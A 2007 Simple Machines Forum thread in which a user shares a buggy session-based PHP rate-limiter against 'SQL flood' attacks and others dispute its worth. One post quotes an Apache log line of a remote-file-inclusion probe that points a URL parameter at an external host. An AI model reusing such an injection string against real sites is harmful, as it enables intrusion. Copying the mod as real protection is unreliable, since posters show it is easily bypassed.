AntiSqlFlood by kike [SECURITY]

pixelsdream · December 18, 2007, 09:42:38 AM

Hi i want share with all one of my new modifications in smf 1.1.4 its a protection for sql flood attacks

First create a new document called

Quoteantisqlflood.php

Second copy and paste this code


<?php 
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//Esta obra está bajo una licencia de Creative Commons (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
	session_start(); 
	$tiempoespera = 30; 
	$session = "sqlfloodprotection"; 
	if ( isset($_SESSION["{$session}"]) && ( $_SESSION["{$session}"] >= time() - $tiempoespera ) ) 
	{ 
          exit("<center><img src='http://www.pixelsdream.com/antiflood.jpg' width='234' height='234' alt='antisqlflood by kike'/><b>Please, wait 30 seconds for made another query or action</b><br><b>Por favor, espera 30 segundos para realizar otra consulta o accion</b></br>Press <b><a href='index.php'>here</a></b> for return to index<br>Pulsa <b><a href='index.php'>aqui</a></b> para volver al indice<br><br><br>Sql Flood Protection for smf by Kike([email protected])<br>Developed by www.pixelsdream.com<br>Desarrollado por www.pixelsdream.com
		<br>  
		<br>  
		<br> 
		  <a rel='license' href='http://creativecommons.org/licenses/by-nc-sa/2.5/es/'>
<img alt='Creative Commons License' style='border-width:0' src='http://creativecommons.org/images/public/somerights20.png' />
</a>
		  </center>"); 
          return false; 
	} 
	$_SESSION["{$session}"] = time(); 
//AntiSqlFlood by kike([email protected])
//www.pixelsdream.com
//Esta obra está bajo una licencia de Creative Commons (http://creativecommons.org/licenses/by-nc-sa/2.5/es/)
?>

Next you need protect all of actions from index.php

find this line...

Code Select

global $modSettings, $settings, $user_info, $board, $topic, $maintenance, $sourcedir;

and add before

Code Select

	//antidos protection by kike ([email protected])
	if (isset($_GET['action']) && $_GET['action'] == 'search2' || $_GET['action'] == 'search'){
	include 'antisqlflood.php';
	}
	if (isset($_GET['action']) && $_GET['action'] == 'login' || $_GET['action'] == 'login2'){
	include 'antisqlflood.php';

	}

That's all thanks for our attention and enjoy this modification

karlbenson · December 18, 2007, 10:55:24 AM

Nice but you might want to change the image link to your own.

Especially since
a) the first link is a warez site
b) the site is suspended by the isp. (no doubt for a) )

pixelsdream · December 18, 2007, 11:20:32 AM

Thanks karlbenson for report i changed the image this works good.

P.D-Any SqlFlooders can't support cookies and sessions use cookies, one good idea is make connection with mysql for save all times and ips, if anyone want this last modification can sendme a mail([email protected]) and i can share my latest code

P.D2-karlbenson the site is suspended for abusive use of server(sql flood attack). Anybody has attacked my site and i maked this script for prevent new attacks

rummie · December 18, 2007, 03:29:58 PM

no offense, but the code is stupid and a waste of time, also cannot do what it claims.

pixelsdream · December 18, 2007, 04:05:46 PM

have you tried the code? for my forum is too usefull adding some lines

you doesn't tried sql flood attack??

rummie · December 18, 2007, 05:03:51 PM

Ok... just read it.. it's rubbish.

E107 has some good anti-flood code, download and study that, then return

pixelsdream · December 18, 2007, 07:16:38 PM

you haven't got any idea of what sql attacks im saying... ¬¬
in my forum works perfect you can test it, whats your forum for check your megahyperprotection? xD
your replies are the unique rubish of this post...
im studing php and mysql for 5 years ago, do you want teach me today? dont makes me laught please...
if yo want and know php and mysql modify my script and remplace sessions(cookies) for mysql querys and this script can be the best protection for sql attacks

pd-about E107 anti-flood code i dont know this can you tellme the url of this project please?

rummie · December 19, 2007, 09:23:16 AM

yes, you are right and I am wrong.
forgive me for doubting you, oh master!

(LMAO)

Dragooon · December 19, 2007, 09:30:20 AM

.....@rummie : Your attitude wasn't appreciated and no one is interested in your stupid replies.
if you have a reason why it is stupid tell.....

And If I get this right, This is too prevent spamming SQL Queries. And this is for SMF NOT E107.

Marook · December 19, 2007, 11:10:15 AM

looks interesting, but can you explain the code ? In your antisqlflood.php you're testing the session var [fon=Courier New]sqlfloodprotection[/font] but when will this var to be set ?

rummie · December 19, 2007, 11:16:44 AM

cv;foreach <?php //Auto edit for SMF

Marook · December 19, 2007, 11:28:33 AM

I will download the E107 and check the floodprotection. I've also written an 'antihacker' script, because everyday hundreds of scriptkiddies wanted to find any securityleaks and tries to execute their bots on my site. ATM im checking every GET request, removing possible attack strings like SELECT, SCRIPT ... and compares the original GET with the replaced one. If its the same, everything went right. Otherwise you will get an error and banned by .htaccess for 60 mins. What do think about it? Is there any other way to figure out a possible hack attack ?

karlbenson · December 19, 2007, 11:42:47 AM

If people are running bots, its not to difficult to run the requests through a series of proxies.

Thus nullifying this script entirely.

I can think of a dozen ways to easily overload a forum, although for obvious reasons I wouldn't post them here.

Marook · December 19, 2007, 11:50:24 AM

would you like to try it at my website ? I could check the logfiles and maybe i can improve the script...

karlbenson · December 19, 2007, 11:55:31 AM

I wouldn't bother. It would be a waste of time, just think about it.

Your thinking that attacks come from 1 person.
When in fact it could be 10 or even a small botnet could amount to 100's.

Marook · December 19, 2007, 12:01:47 PM

Yes you're right but in the past there are almost single script kiddies who wants to inject some code. When a small botnet is attacking my site, all ips are getting banned after the first try. This script works fine atm but i just want to improve it to avoid the daily scriptkiddie-perl-script-code-injection

karlbenson · December 19, 2007, 12:04:39 PM

I've never had a need for anything like this with smf.

At the end of the day the ONLY way to counter a ddos attack is by server firewalls and ip blocking.

Marook · December 19, 2007, 12:12:05 PM

Code Select


*********.net - - [18/Dec/2007:10:37:42 +0100] "GET /smf/index.php?x=http://dd3str0y3r.vilabol.uol.com.br/sk4n/safeon.txt?? HTTP/1.1" 302 353 "-" "libwww-perl/5.79"

This kind of request fills out my apache log every day...and i just want a solution for all those who don't have a virtual or dedicated server like me. I just have webspace, can't install a firewall but still searching for a way to prevent code injections.

karlbenson · December 19, 2007, 12:18:03 PM

But thats not going to do anything into smf.

Actions are sanitized, escape, preg_matched, validated etc.

All you'll get there is an entry in your log. when in fact that user would simply have been redirected to the board index.

rummie · December 19, 2007, 12:23:54 PM

cv;foreach <?php //Auto edit for SMF

News:

AntiSqlFlood by kike [SECURITY]

rummie

rummie

rummie

rummie

rummie